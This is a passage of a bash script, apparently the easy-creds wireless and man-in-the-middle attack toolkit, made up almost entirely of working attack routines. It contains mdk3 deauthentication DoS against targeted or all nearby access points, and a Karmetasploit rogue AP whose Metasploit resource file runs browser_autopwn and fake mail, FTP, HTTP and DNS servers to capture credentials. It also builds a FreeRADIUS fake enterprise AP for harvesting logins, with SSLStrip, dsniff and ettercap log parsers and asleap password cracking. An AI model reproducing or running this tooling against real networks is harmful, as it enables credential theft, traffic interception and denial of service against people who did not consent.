eviltwin=1
ESSID=default
f_fakeapAttack
}
##################################################
f_mdk3aps(){
clear
f_Banner
dosattack=1
# grep the MACs to a temp white list
ifconfig -a| grep wlan| grep -o -E '([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}' > /tmp/ec/ec-white.lst
echo
read -p "Do you have the BSSID address of the AP you'd like to attack? [y/N]: " havemac
havemac="$(echo ${havemac} | tr 'A-Z' 'a-z')"
echo
if [ "$havemac" == "y" ]; then
dosmac=
while [ -z "$dosmac" ]; do read -p "Please enter the BSSID address of the AP you wish to DoS: " dosmac; done
echo "$dosmac" > /tmp/ec/ec-dosap
airmon-ng | egrep 'wlan|ath' | sed '$a\\n'
doswlan=
while [ -z $doswlan ];do read -p "Please enter the wireless device to use for DoS attack: " doswlan; done
phyint=$(airmon-ng | grep $doswlan | sed -n "s/.*\([[].*[]]\).*/\1/;s/[[]//;s/[]]//p;")
echo -e "\nPlacing the wireless card in monitor mode to perform DoS attack."
airmon-ng start $doswlan &
sleep 3
dosmon=$(airmon-ng | sed -n "s/.*\(mon.*$phyint\).*/\1/p;" | cut -f1)
echo -e "\nUsing $dosmon for the attack.\n\n"
echo -e "\n\e[1;33m[*] Please stand by while we DoS the AP with BSSID Address $dosmac...\e[0m"
sleep 3
if [ -z $isxrunning ]; then
screen -S easy-creds -t MDK3-DoS -X screen mdk3 $dosmon d -b /tmp/ec/ec-dosap
else
xterm -geometry "$width"x$height+$x-$y -T "MDK3 AP DoS" -e mdk3 $dosmon d -b /tmp/ec/ec-dosap &
fi
echo $! > /tmp/dosap-pid
sleep 5m && kill $(cat /tmp/ec/dosap-pid) &
echo $! > /tmp/ec/sleep.pid
echo -e "\n\e[1;33m[*] Attack will run for 5 minutes or you can close the xterm window to stop the AP DoS attack...\e[0m"
else
f_getbssids
fi
}
##################################################
f_lastman(){
clear
f_Banner
dosattack=1
echo -e "\n\e[1;33m[*] This attack will DoS every AP BSSID & Client MAC it can reach.\e[0m\n\e[1;31mUse with extreme caution\e[0m\n\n"
# grep the MACs to a temp white list
ifconfig | grep wlan| grep -o -E '([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}' > /tmp/ec/ec-white.lst
airmon-ng | egrep '(wlan|mon)' | sed '$a\\n'
doswlan=
while [ -z $doswlan ];do read -p "Please enter the wireless device to use for DoS attack: " doswlan; done
phyint=$(airmon-ng | grep $doswlan | sed -n "s/.*\([[].*[]]\).*/\1/;s/[[]//;s/[]]//p;")
echo -e "\nPlacing the wireless card in monitor mode to perform DoS attack."
airmon-ng start $doswlan &
sleep 3
dosmon=$(airmon-ng | sed -n "s/.*\(mon.*$phyint\).*/\1/p;" | cut -f1)
echo -e "\nUsing $dosmon for attack."
if [ -z $isxrunning ]; then
screen -S easy-creds -t Last-Man-Standing -X screen mdk3 $dosmon d -w /tmp/ec/ec-white.lst;(airmon-ng stop $dosmon >/dev/null)
else
xterm -geometry 70x10+0-0 -T "Last Man Standing" -e mdk3 $dosmon d -w /tmp/ec/ec-white.lst;(airmon-ng stop $dosmon >/dev/null) &
fi
echo $! > /tmp/ec/dosap-pid
sleep 5m && kill $(cat /tmp/ec/dosap-pid) &
echo $! > /tmp/ec/sleep.pid
airmon-ng stop $dosmon >/dev/null
echo -e "\n\e[1;33m[*] Attack will run for 5 minutes or you can close the xterm window to stop the AP DoS attack...\e[0m"
sleep 7
}
##################################################
f_getbssids(){
clear
f_Banner
echo -e "\n\e[1;33m[*] This will launch airodump-ng and allow you to specify the AP to DoS\e[0m\n"
airmon-ng | grep wlan | sed '$a\\n'
airowlan=
while [ -z $airowlan ];do read -p "Please enter the wireless device to use for DoS attack: " airowlan; done
phyint=$(airmon-ng | grep $airowlan | sed -n "s/.*\([[].*[]]\).*/\1/;s/[[]//;s/[]]//p;")
echo -e "\nPlacing the wireless card in monitor mode to perform DoS attack."
airmon-ng start $airowlan > /dev/null &
sleep 3
airomon=$(airmon-ng | sed -n "s/.*\(mon.*$phyint\).*/\1/p;" | cut -f1)
echo -e "\n\e[1;33m[*] Starting airodump-ng with $airomon, [ctrl+c] in the window when you see the ESSID(s) you want to attack.\e[0m\n"
if [ -z $isxrunning ]; then
screen -S easy-creds -t Airodump -X screen $airodumppath/airodump-ng $airomon -w /tmp/ec/airodump-ec --output-format csv
else
xterm -geometry 90x25+0+0 -T "Airodump" -e $airodumppath/airodump-ng $airomon -w /tmp/ec/airodump-ec --output-format csv &
fi
echo $! > /tmp/ec/airodump-pid
#wait for the process to die
while [ ! -z $(ps -p "$(cat /tmp/ec/airodump-pid)" | grep "$(cat /tmp/ec/airodump-pid)" | sed 's/ //g') ]; do sleep 3; done
sleep 3
#sometimes the mon interface doesn't transition properly after airodump, decided to stop the interface and restart it clean
airmon-ng stop $airomon &> /dev/null
echo -e "\n\e[1;33m[*] The following APs were identified:\e[0m\n"
#IFS variable allows for spaces in the name of the ESSIDs and will still display it on one line
SAVEIFS=$IFS
IFS=$(echo -en "\n\b")
for apname in $(cat /tmp/ec/airodump-ec-01.csv | egrep -a '(OPN|MGT|WEP|WPA)'| cut -d "," -f14| sort -u);do
echo [*] "$apname"
done
echo
IFS=$SAVEIFS
dosapname=
while [ -z $dosapname ]; do
read -p "Please enter the ESSID you'd like to attack: " dosapname
done
cat /tmp/ec/airodump-ec-01.csv | egrep -a '(OPN|MGT|WEP|WPA)'| grep -a -i "$dosapname" |cut -d "," -f1 > /tmp/ec/ec-macs
rm /tmp/ec/airodump-ec*
#Make sure none of your MACs end up in the blacklist
diff -i /tmp/ec/ec-macs /tmp/ec/ec-white.lst | grep -v ">"|grep -o -E '([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}' > /tmp/ec/ec-dosap
echo -e "\nNow Deauthing clients from $dosapname.\n\nIf there is more than one BSSID, all will be attacked...\n"
airmon-ng start $airowlan &> /dev/null
sleep 3
if [ -z $isxrunning ]; then
screen -S easy-creds -t MDK3-AP-DoS -X screen mdk3 $airomon d -b /tmp/ec/ec-dosap;(airmon-ng stop $airomon >/dev/null)
echo -e "\n Exit the MDK3-AP-DoS in the easy-creds session to stop the attack"
sleep 5
else
xterm -geometry 70x10+0-0 -T "MDK3 AP DoS" -e mdk3 $airomon d -b /tmp/ec/ec-dosap;(airmon-ng stop $airomon >/dev/null) &
echo -e "\nPlease close the xterm window to stop the attack..."
sleep 5
fi
}
##################################################
f_KarmaAttack(){
wireless=1
karmasploit=1
# Credit to Metasploit Unleashed, used as a base
clear
f_Banner
f_xtermwindows
echo -e "Network Interfaces:\n"
ifconfig | awk '/Link encap:Eth/ {print;getline;print}' | sed '{ N; s/\n/ /; s/Link en.*.HWaddr//g; s/ Bcast.*//g; s/UP.*.:1//g; s/inet addr/IP/g; }' | sed '$a\\n'
while [ -z $IFACE ]; do read -p "Interface connected to the internet, example eth0: " IFACE; done
airmon-ng
while [ -z $WIFACE ]; do read -p "Wireless interface name, example wlan0: " WIFACE; done
airmon-ng start $WIFACE &> /dev/null
modprobe tun
echo -e "\n\e[1;33m[*] Your interface has now been placed in Monitor Mode\e[0m\n"
airmon-ng | grep mon | sed '$a\\n'
MONMODE=
while [ -z $MONMODE ]; do read -p "Enter your monitor enabled interface name (ex. mon0): " MONMODE; done
TUNIFACE=
while [ -z $TUNIFACE ]; do read -p "Enter your tunnel interface (ex. at0): " TUNIFACE; done
f_karmadhcp
f_karmasetup
f_karmafinal
f_mainmenu
}
##################################################
f_karmadhcp(){
ATCIDR=
while [ -z $ATCIDR ]; do read -p "Network range for your tunneled interface, example 10.0.0.0/24: " ATCIDR; done
ATDNS=
while [ -z $ATDNS ]; do read -p "Enter the IP address for the DNS server, example 8.8.8.8: " ATDNS; done
f_ipcalc
}
##################################################
f_karmasetup(){
echo "use auxiliary/server/browser_autopwn" >> /tmp/ec/karma.rc
echo "setg AUTOPWN_HOST $ATIP" >> /tmp/ec/karma.rc
echo "setg AUTOPWN_PORT 55550" >> /tmp/ec/karma.rc
echo "setg AUTOPWN_URI /ads" >> /tmp/ec/karma.rc
echo "set LHOST $ATIP" >> /tmp/ec/karma.rc
echo "set LPORT 45000" >> /tmp/ec/karma.rc
echo "set SRVPORT 55550" >> /tmp/ec/karma.rc
echo "set URIPATH /ads" >> /tmp/ec/karma.rc
echo "run" >> /tmp/ec/karma.rc
echo "use auxiliary/server/capture/pop3" >> /tmp/ec/karma.rc
echo "set SRVPORT 110" >> /tmp/ec/karma.rc
echo "set SSL false" >> /tmp/ec/karma.rc
echo "run" >> /tmp/ec/karma.rc
echo "use auxiliary/server/capture/pop3" >> /tmp/ec/karma.rc
echo "set SRVPORT 995" >> /tmp/ec/karma.rc
echo "set SSL true" >> /tmp/ec/karma.rc
echo "run" >> /tmp/ec/karma.rc
echo "use auxiliary/server/capture/ftp" >> /tmp/ec/karma.rc
echo "run" >> /tmp/ec/karma.rc
echo "use auxiliary/server/capture/imap" >> /tmp/ec/karma.rc
echo "set SSL false" >> /tmp/ec/karma.rc
echo "set SRVPORT 143" >> /tmp/ec/karma.rc
echo "run" >> /tmp/ec/karma.rc
echo "use auxiliary/server/capture/imap" >> /tmp/ec/karma.rc
echo "set SSL true" >> /tmp/ec/karma.rc
echo "set SRVPORT 993" >> /tmp/ec/karma.rc
echo "run" >> /tmp/ec/karma.rc
echo "use auxiliary/server/capture/smtp" >> /tmp/ec/karma.rc
echo "set SSL false" >> /tmp/ec/karma.rc
echo "set SRVPORT 25" >> /tmp/ec/karma.rc
echo "run" >> /tmp/ec/karma.rc
echo "use auxiliary/server/capture/smtp" >> /tmp/ec/karma.rc
echo "set SSL true" >> /tmp/ec/karma.rc
echo "set SRVPORT 465" >> /tmp/ec/karma.rc
echo "run" >> /tmp/ec/karma.rc
echo "use auxiliary/server/fakedns" >> /tmp/ec/karma.rc
echo "unset TARGETHOST" >> /tmp/ec/karma.rc
echo "set SRVPORT 5353" >> /tmp/ec/karma.rc
echo "run" >> /tmp/ec/karma.rc
echo "use auxiliary/server/fakedns" >> /tmp/ec/karma.rc
echo "unset TARGETHOST" >> /tmp/ec/karma.rc
echo "set SRVPORT 53" >> /tmp/ec/karma.rc
echo "run" >> /tmp/ec/karma.rc
echo "use auxiliary/server/capture/http" >> /tmp/ec/karma.rc
echo "set SRVPORT 80" >> /tmp/ec/karma.rc
echo "set SSL false" >> /tmp/ec/karma.rc
echo "run" >> /tmp/ec/karma.rc
echo "use auxiliary/server/capture/http" >> /tmp/ec/karma.rc
echo "set SRVPORT 8080" >> /tmp/ec/karma.rc
echo "set SSL false" >> /tmp/ec/karma.rc
echo "run" >> /tmp/ec/karma.rc
echo "use auxiliary/server/capture/http" >> /tmp/ec/karma.rc
echo "set SRVPORT 443" >> /tmp/ec/karma.rc
echo "set SSL true" >> /tmp/ec/karma.rc
echo "run" >> /tmp/ec/karma.rc
echo "use auxiliary/server/capture/http" >> /tmp/ec/karma.rc
echo "set SRVPORT 8443" >> /tmp/ec/karma.rc
echo "set SSL true" >> /tmp/ec/karma.rc
echo "run" >> /tmp/ec/karma.rc
}
##################################################
f_karmafinal(){
echo -e "\n\e[1;33m[*] Launching Airbase...\e[0m"
# airbase-ng is going to create our fake AP with the SSID default
if [ -z $isxrunning ]; then
screen -dmS easy-creds -t Airbase-NG airbase-ng -P -C 60 -e default $MONMODE
else
xterm -geometry "$width"x$height-$x+$y -T "Airbase-NG" -e airbase-ng -P -C 60 -e "default" $MONMODE &
fi
echo $! > /tmp/ec/ec-karma-pid
sleep 7
echo -e "\n\e[1;33m[*] Configuring tunneled interface.\e[0m"
ifconfig $TUNIFACE up
ifconfig $TUNIFACE $ATIP netmask $ATSUB
ifconfig $TUNIFACE mtu 1400
route add -net $ATNET netmask $ATSUB gw $ATIP dev $TUNIFACE
sleep 3
echo -e "\n\e[1;33m[*] Setting up iptables to handle traffic seen by the tunneled interface.\e[0m"
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
iptables -t nat -A POSTROUTING -o $IFACE -j MASQUERADE
sleep 3
#Blackhole Routing - Forces clients to go through attacker even if they have cached DNS entries
iptables -t nat -A PREROUTING -i $TUNIFACE -j REDIRECT
echo -e "\n\e[1;33m[*] Launching Tail...\e[0m"
if [ -z $isxrunning ]; then
screen -S easy-creds -t DMESG -X screen tail -f /var/log/messages
else
y=$(($y+$yoffset))
xterm -geometry "$width"x$height-$x+$y -T "DMESG" -bg black -fg red -e tail -f /var/log/messages &
fi
echo $! > /tmp/ec/tail.pid
sleep 3
echo -e "\n\e[1;33m[*] DHCP server starting on tunneled interface.\e[0m\n"
if [ -e /etc/dhcp3/dhcpd.conf ]; then
dhcpd3 -q -cf $DHCPPATH -pf /var/run/dhcp3-server/dhcpd.pid $TUNIFACE &
elif [ -e /etc/sysconfig/dhcpd ]; then
systemctl start dhcpd.service
else
service dhcpd start
fi
sleep 3
if [ -z $isxrunning ]; then
echo -e "\n\e[1;33m[*] Launching Karmetasploit in screen. Once it loads press ctrl-a then d return to this window.\e[0m\n"
sleep 5
screen -S Karmetasploit -t msfconsole msfconsole -r /tmp/ec/karma.rc
else
echo -e "\n\e[1;33m[*] Launching Karmetasploit, this may take a little bit...\e[0m\n"
y=$(($y+$yoffset))
xterm -geometry "$width"x$height-$x+$y -bg black -fg white -T "Karmetasploit" -e msfconsole -r /tmp/ec/karma.rc &
echo $! > /tmp/ec/ec-metasploit-pid
fi
#Enable IP forwarding
echo "1" > /proc/sys/net/ipv4/ip_forward
echo -e "\n\e[1;33m[*] Do you ever imagine things in the garden of your mind?\e[0m"
sleep 5
}
##################################################
f_freeradiusattack(){
clear
f_Banner
fra=1
atheroscard=$(lsmod | grep -c 'ath')
if [ -z $atheroscard ]; then
echo -e "\n\e[1;31m[-] I could not find and Atheros wireless card.\nAttack only works with an atheros chipset...\e[0m\n"
sleep 5
fi
mv $pathtoradiusconf/radiusd.conf $pathtoradiusconf/radiusd.conf.back
mv $pathtoradiusconf/clients.conf $pathtoradiusconf/clients.conf.back
if [ -e $pathtoradiusconf ]; then
cat $pathtoradiusconf/radiusd.conf.back | sed -e '/^proxy_request/s/yes/no/' -e 's/\$INCLUDE proxy.conf/#\$INCLUDE proxy.conf/' > $pathtoradiusconf/radiusd.conf
else
while [! -e $pathtoradiusconf ] && [ -z $pathtoradiusconf ]; do
echo -e "\n\e[1;31m[-] I cannot find your radius.conf file, please provide the path\e[0m"
read -e -p ": " pathtoradiusconf
done
cat "$pathtoradiusconf" | sed -e '/^proxy_request/s/yes/no/' -e 's/\$INCLUDE proxy.conf/#\$INCLUDE proxy.conf/' > $pathtoradiusconf/radiusd.conf
fi
radiussecret=
while [ -z $radiussecret ]; do
read -p "Please enter the shared secret you'd like to use for the radius connection: " radiussecret
done
echo
f_buildclientsconf
f_hostapd
f_freeradiusfinal
f_mainmenu
}
##################################################
f_buildclientsconf(){
echo "client localhost {" > $pathtoradiusconf/clients.conf
echo " ipaddr = 127.0.0.1" >> $pathtoradiusconf/clients.conf
echo " secret = $radiussecret" >> $pathtoradiusconf/clients.conf
echo " require_message_authenticator = no" >> $pathtoradiusconf/clients.conf
echo " nastype = other" >> $pathtoradiusconf/clients.conf
echo "}" >> $pathtoradiusconf/clients.conf
echo "client 192.168.0.0/16 {" >> $pathtoradiusconf/clients.conf
echo " secret = $radiussecret" >> $pathtoradiusconf/clients.conf
echo " shortname = testAP" >> $pathtoradiusconf/clients.conf
echo "}" >> $pathtoradiusconf/clients.conf
echo "client 172.16.0.0/12 {" >> $pathtoradiusconf/clients.conf
echo " secret = $radiussecret" >> $pathtoradiusconf/clients.conf
echo " shortname = testAP" >> $pathtoradiusconf/clients.conf
echo "}" >> $pathtoradiusconf/clients.conf
echo "client 10.0.0.0/8 {" >> $pathtoradiusconf/clients.conf
echo " secret = $radiussecret" >> $pathtoradiusconf/clients.conf
echo " shortname = testAP" >> $pathtoradiusconf/clients.conf
echo "}" >> $pathtoradiusconf/clients.conf
# echo "client $ATCIDR {" >> $pathtoradiusconf/clients.conf
# echo " secret = $radiussecret" >> $pathtoradiusconf/clients.conf
# echo " shortname = testAP" >> $pathtoradiusconf/clients.conf
# echo "}" >> $pathtoradiusconf/clients.conf
}
##################################################
f_hostapd(){
airmon-ng | grep 'wlan'
radwiface=
while [ -z $radwiface ]; do
echo -en "\nPlease enter your wirless interface for the attack (ex: wlan0)"
read -p " : " radwiface
done
radssid=
while [ -z $radssid ]; do
echo -en "\nPlease enter SSID you'd like to use for the attack (ex: FreeWifi)"
read -p " : " radssid
done
radchannel=
while [ -z $radchannel ]; do
echo -en "\nPlease enter the channel you'd like to use for the attack"
read -p " : " radchannel
done
echo "interface=$radwiface" > /tmp/ec/ec-hostapd.conf
echo "driver=nl80211" >> /tmp/ec/ec-hostapd.conf
echo "ssid=$radssid" >> /tmp/ec/ec-hostapd.conf
echo "logger_stdout=-1" >> /tmp/ec/ec-hostapd.conf
echo "logger_stdout_level=0" >> /tmp/ec/ec-hostapd.conf
echo "dump_file=/tmp/hostapd.dump" >> /tmp/ec/ec-hostapd.conf
echo "ieee8021x=1" >> /tmp/ec/ec-hostapd.conf
echo "eapol_key_index_workaround=0" >> /tmp/ec/ec-hostapd.conf
echo "own_ip_addr=127.0.0.1" >> /tmp/ec/ec-hostapd.conf
echo "auth_server_addr=127.0.0.1" >> /tmp/ec/ec-hostapd.conf
echo "auth_server_port=1812" >> /tmp/ec/ec-hostapd.conf
echo "auth_server_shared_secret=$radiussecret" >> /tmp/ec/ec-hostapd.conf
echo "wpa=1" >> /tmp/ec/ec-hostapd.conf
echo "hw_mode=g" >> /tmp/ec/ec-hostapd.conf
echo "channel=$radchannel" >> /tmp/ec/ec-hostapd.conf
echo "wpa_pairwise=TKIP CCMP" >> /tmp/ec/ec-hostapd.conf
echo "wpa_key_mgmt=WPA-EAP" >> /tmp/ec/ec-hostapd.conf
}
f_freeradiusfinal(){
echo -e "\n\e[1;33m[*] Launching the FreeRadius server...\e[0m\n"
if [ ! -z $isxrunning ]; then
xterm -geometry "$width"x$height-$x+$y -T "radiusd" -bg white -fg black -e radiusd -X -f &
echo $! > /tmp/ec/freeradius.pid
sleep 3
else
screen -dmS FreeRadius -t radiusd $pathtoradiusd/radiusd -X -f
echo $! > /tmp/ec/freeradius.pid
fi
echo -e "\n\e[1;33m[*] Launching hostapd...\e[0m\n"
sleep 3
if [ ! -z $isxrunning ]; then
y=$(($y+$yoffset))
xterm -geometry "$width"x$height-$x+$y -T "hostapd" -bg black -fg white -e $pathtohostapd/hostapd /tmp/ec/ec-hostapd.conf &
sleep 3
else
screen -S FreeRadius -t hostapd -X screen $pathtohostapd/hostapd /tmp/ec/ec-hostapd.conf
echo $! > /tmp/ec/hostapd.pid
fi
if [ ! -e $freeradiuslog ]; then
touch $findradiuslog/freeradius-server-wpe.log
freeradiuslog=$findradiuslog/freeradius-server-wpe.log
fi
echo -e "\n\e[1;33m[*] Launching credential log file...\e[0m\n"
sleep 3
if [ ! -z $isxrunning ]; then
y=$(($y+$yoffset))
xterm -geometry "$width"x$height-$x+$y -T "credentials" -bg black -fg green -hold -l -lf $logfldr/freeradius-creds-$(date +%F-%H%M).txt -e tail -f $freeradiuslog &
echo $! > /tmp/ec/tail.pid
sleep 3
else
screen -S FreeRadius -t credentials -X screen tail -f $freeradiuslog/freeradius-server-wpe.log
screen -S easy-creds -X select 2
screen -S easy-creds -X logfile $logfldr/freeradius-creds-$(date +%F-%H%M).txt
screen -S easy-creds -X log
echo $! > /tmp/ec/tail.pid
fi
tshark -i $radwiface -w $logfldr/freeradius-creds-$(date +%F-%H%M).dump &> /dev/null &
echo $! > /tmp/ec/tshark.pid
}
##################################################
#
# DATA REVIEW FUNCTIONS
#
##################################################
f_SSLStrip(){
clear
f_Banner
if [ -d $logfldr ]; then
echo "SSLStrip logs in current log folder:"
ls $logfldr/sslstrip* 2>/dev/null
echo -e "\n\n"
fi
if [ -e /$PWD/strip-accts.txt ]; then rm /$PWD/strip-accts.txt; fi
# Coded with help from 'Crusty Old Fart' - Ubuntu Forums
LOGPATH=
while [ -z $LOGPATH ] || [ ! -f "$LOGPATH" ]; do read -e -p "Enter the full path to your SSLStrip log file: " LOGPATH; done
DEFS=
while [ -z $DEFS ] || [ ! -e "$DEFS" ]; do
read -e -p "Enter the full path to your definitions file [/pentest/sniffers/easy-creds/definitions.sslstrip]: " DEFS
if [ -z $DEFS ]; then DEFS="/pentest/sniffers/easy-creds/definitions.sslstrip"; fi
done
NUMLINES=$(cat "$DEFS" | wc -l)
i=1
while [ $i -le "$NUMLINES" ]; do
VAL1=$(awk -v k=$i 'FNR == k {print $1}' "$DEFS")
VAL2=$(awk -v k=$i 'FNR == k {print $2}' "$DEFS")
VAL3=$(awk -v k=$i 'FNR == k {print $3}' "$DEFS")
VAL4=$(awk -v k=$i 'FNR == k {print $4}' "$DEFS")
GREPSTR="$(grep -a $VAL2 "$LOGPATH" | grep -a $VAL3 | grep -a $VAL4)"
if [ "$GREPSTR" ]; then
echo -n "$VAL1" "- " >> /$PWD/strip-accts.txt
echo "$GREPSTR" | \
sed -e 's/.*'$VAL3'=/'$VAL3'=/' -e 's/&/ /' -e 's/&.*//' >> /$PWD/strip-accts.txt
fi
i=$[$i+1]
done
if [ -s /$PWD/strip-accts.txt ] && [ -z $isxrunning ]; then
cat /$PWD/strip-accts.txt | less
elif [ -s /$PWD/strip-accts.txt ] && [ ! -z $isxrunning ]; then
xterm -geometry 80x24-0+0 -T "SSLStrip Accounts" -hold -bg white -fg black -e cat /$PWD/strip-accts.txt &
else
echo -e "\n\e[1;31m[-] Sorry no credentials captured...\e[0m"
fi
}
#######################################################
f_dsniff(){
clear
f_Banner
if [ -d $logfldr ]; then
echo "Dsniff logs in current log folder:"
ls $logfldr/ 2>/dev/null
echo -e "\n\n"
fi
DSNIFFPATH=
while [ -z $DSNIFFPATH ] || [ ! -f "$DSNIFFPATH" ]; do
read -e -p "Enter the path for your dsniff Log file: " DSNIFFPATH
done
dsniff -r $DSNIFFPATH >> /$PWD/dsniff-log.txt
if [ -z $isxrunning ];then
cat /$PWD/dnsiff-log.txt | less
else
xterm -hold -bg blue -fg white -geometry 80x24-0+0 -T "Dsniff Accounts" -e cat /$PWD/dsniff-log.txt &
fi
}
##################################################
f_EtterLog(){
clear
f_Banner
if [ -d $logfldr ]; then
echo "Ettercap logs in current log folder:"
ls $logfldr/*.eci 2>/dev/null
echo -e "\n\n"
fi
ETTERECI=
while [ -z $ETTERECI ] || [ ! -f "$ETTERECI" ]; do read -e -p "Enter the full path to your ettercap.eci log file: " ETTERECI; done
etterlog -p "$ETTERECI" >> /$PWD/etterlog.txt
if [ -z $isxrunning ]; then
cat /$PWD/etterlog.txt | less
else
xterm -hold -bg blue -fg white -geometry 80x24-0+0 -T "Ettercap Accounts" -e cat /$PWD/etterlog.txt &
fi
}
##################################################
f_freeradiuscreds(){
while [ -z "$credlist" ] && [ ! -e "$credlist" ]; do
echo -n -e "\nPlease enter the path to your FreeRadius Attack credential list"
read -e -p ": " credlist
done
while [ -z "$wordlist" ] && [ ! -e "$wordlist" ]; do
echo -n -e "\nPlease enter the path to your wordlist"
read -e -p ": " wordlist
done
echo -n -e "\n\e[1;33m[*] Please standby, this may take a while...\e[0m"
acreds="$PWD/asleap-creds-$(date +%F-%H%M).txt"
touch $acreds
cat $credlist|egrep 'username|challenge|response'| cut -d " " -f2 > /tmp/ec/freeradius-creds.tmp
NUMLINES=$(cat /tmp/ec/freeradius-creds.tmp | wc -l)
i=1
while [ $i -le "$NUMLINES" ]; do
username=$(awk NR==$i /tmp/ec/freeradius-creds.tmp)
i=$[$i+1]
challenge=$(awk NR==$i /tmp/ec/freeradius-creds.tmp|tr -d '\r')
i=$[$i+1]
response=$(awk NR==$i /tmp/ec/freeradius-creds.tmp|tr -d '\r')
i=$[$i+1]
echo "Username: $username" >> "$acreds"
$asleappath/asleap -C $challenge -R $response -W $wordlist | grep "password:"| sed -e 's/[\t ]//g;/^$/d'| sed -e 's/:/: /g' >> "$acreds"
echo >> $acreds
done
echo -n -e "\n\e[1;33m[*] Your cracked credentials can be found at $acreds...\e[0m"
sleep 5
f_mainmenu
}
##################################################
#
# MENU FUNCTIONS
#
##################################################
f_Banner(){
echo -e " ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ "
echo -e "||\e[1;36me\e[0m |||\e[1;36ma\e[0m |||\e[1;36ms\e[0m |||\e[1;36my\e[0m |||\e[1;36m-\e[0m |||\e[1;36mc\e[0m |||\e[1;36mr\e[0m |||\e[1;36me\e[0m |||\e[1;36md\e[0m |||\e[1;36ms\e[0m ||"
echo -e "||__|||__|||__|||__|||__|||__|||__|||__|||__|||__||"
echo -e "|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|"
echo -e "\e[1;33m Version 3.7.3K - KALI of Your Mind\e[0m"
echo
echo -e "\e[1;33mAt any time,\e[0m \e[1;36mctrl+c\e[0m \e[1;33m to cancel and return to the main menu\e[0m"
echo
}
##################################################
f_prereqs(){
clear
f_Banner
echo "1. Edit etter.conf"
echo "2. Edit etter.dns"
echo "3. Install dhcp3 server"
echo "4. Install karmetasploit prereqs"
echo "5. Add tunnel interface to dhcp3-server file"
echo "6. Update Metasploit Framework"
echo "7. Update Aircrack-ng"
echo "8. Update SSLStrip"
echo "9. How-to Videos (Launches Web Browser)"
echo "10. Previous Menu"
echo
read -p "Choice: " prereqschoice
case $prereqschoice in
1) f_nanoetter ;;
2) f_nanoetterdns ;;
3) f_dhcp3install ;;
4) f_karmareqs ;;
5) f_addtunnel ;;
6) f_msfupdate ;;
7) f_aircrackupdate ;;
8) f_sslstrip_vercheck ;;
9) f_howtos ;;
10) f_mainmenu ;;
*) f_prereqs ;;
esac
}
##################################################
f_poisoning(){
clear
f_Banner
echo "1. Create Victim Host List"
echo "2. Standard ARP Poison"
echo "3. Oneway ARP Poison"
echo "4. DHCP Poison"
echo "5. DNS Poison"
echo "6. ICMP Poison"
echo "7. Previous Menu"
echo
read -p "Choice: " poisoningchoice
case $poisoningchoice in
1) f_HostScan ;;
2) f_Standard ;;
3) f_Oneway ;;
4) f_DHCPPoison ;;
5) f_DNSPoison ;;
6) f_ICMP ;;
7) f_mainmenu ;;
*) f_poisoning ;;
esac
}
##################################################
f_fakeapattacks(){
clear
f_Banner
echo "1. FakeAP Attack Static"
echo "2. FakeAP Attack EvilTwin"
echo "3. Karmetasploit Attack"
echo "4. FreeRadius Attack"
echo "5. DoS AP Options"
echo "6. Previous Menu"
echo
read -p "Choice: " fapchoice
case $fapchoice in
1) f_fakeapAttack ;;
2) f_fakeapeviltwin ;;
3) f_KarmaAttack ;;
4) f_freeradiusattack ;;
5) f_DoSOptions ;;
6) f_mainmenu ;;
*) f_FakeAP-Menu ;;
esac
}
######################################################
f_DoSOptions(){
clear
f_Banner
echo "1. Attack a Single or Multiple APs"
echo "2. Last Man Standing (Use with Caution)"
echo "3. Previous Menu"
echo
read -p "Choice: " doschoice
case $doschoice in
1) f_mdk3aps ;;
2) f_lastman ;;
3) f_fakeapattacks ;;
*) f_DoSOptions ;;
esac
}
######################################################
f_DataReviewMenu(){
clear
f_Banner
echo "1. Parse SSLStrip log for credentials"
echo "2. Parse dsniff file for credentials"
echo "3. Parse ettercap eci file for credentials"
echo "4. Parse freeradius attack file for credentials"
echo "5. Previous Menu"
echo
read -p "Choice: " datareviewchoice
case $datareviewchoice in
1) f_SSLStrip ;;
2) f_dsniff ;;
3) f_EtterLog ;;
4) f_freeradiuscreds ;;
5) f_mainmenu ;;
*) f_DataReviewMenu ;;
esac
}
##################################################
f_ICMP(){
clear
f_Banner
echo "\n*** If you are connected to a switch this attack won't work! ***"
echo -e "*** You must be able to see ALL traffic for this attack to work. ***\n\n"
read -p "Are you connected to a switch [y/N]: " icmpswitch
if [ $(echo $icmpswitch | tr 'A-Z' 'a-z') == "y" ]; then
f_ICMPPoison
else
f_poisoning
fi
}
##################################################
f_mainmenu(){
clear
f_Banner
echo "1. Prerequisites & Configurations"
echo "2. Poisoning Attacks"
echo "3. FakeAP Attacks"
echo "4. Data Review"
echo "5. Exit"
echo "q. Quit current poisoning session"
echo
read -p "Choice: " mainchoice
case $mainchoice in
1) clean=; f_prereqs ;;
2) clean=; f_poisoning ;;
3) clean=; f_fakeapattacks ;;
4) clean=; f_DataReviewMenu ;;
5) f_checkexit ;;
1968) f_pbs ;;
Q|q) f_Quit ;;
*) f_mainmenu ;;
esac
}
# run as root
if [ "$(id -u)" != "0" ]; then
echo -e "\e[1;31m[!] This script must be run as root\e[0m" 1>&2
exit 1
else
mkdir /tmp/ec
f_isxrunning
f_xtermwindows
f_findpaths
clean=1
f_mainmenu
fi